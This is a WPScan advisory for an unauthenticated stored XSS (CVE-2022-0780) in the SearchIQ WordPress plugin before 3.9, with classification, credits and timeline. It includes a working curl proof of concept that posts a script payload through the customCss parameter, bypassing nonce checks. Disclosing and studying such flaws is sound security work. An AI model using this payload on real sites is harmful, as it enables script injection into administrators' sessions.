WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

SearchIQ < 3.9 - Unauthenticated Stored XSS

Description

The plugin contains a flag to disable the verification of CSRF nonces, granting unauthenticated attackers access to the siq_ajax AJAX action and allowing them to perform Cross-Site Scripting attacks due to the lack of sanitisation and escaping in the customCss parameter

Proof of Concept

Once the plugin is configured with an API key (can be a dummy one such as 123):

curl https://example.com/wp-admin/admin-ajax.php --data "action=siq_ajax&customCss=</textarea><script>alert('xss')</script>&nononce=1&task=set_custom_style"

The XSS will be triggered when an admin open the Options tab of the plugin (/wp-admin/admin.php?page=dwsearch&tab=tab-2)

Affects Plugins

searchiq
Fixed in version 3.9

References

CVE
CVE-2022-0780

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website
https://cyllective.com/
Submitter twitter
cyllective
Verified

Yes

WPVDB ID
0ee7d1a8-9782-4db5-b055-e732f2763825

Timeline

Publicly Published

2022-03-28 (about 3 months ago)

Added

2022-03-28 (about 3 months ago)

Last Updated

2022-04-11 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin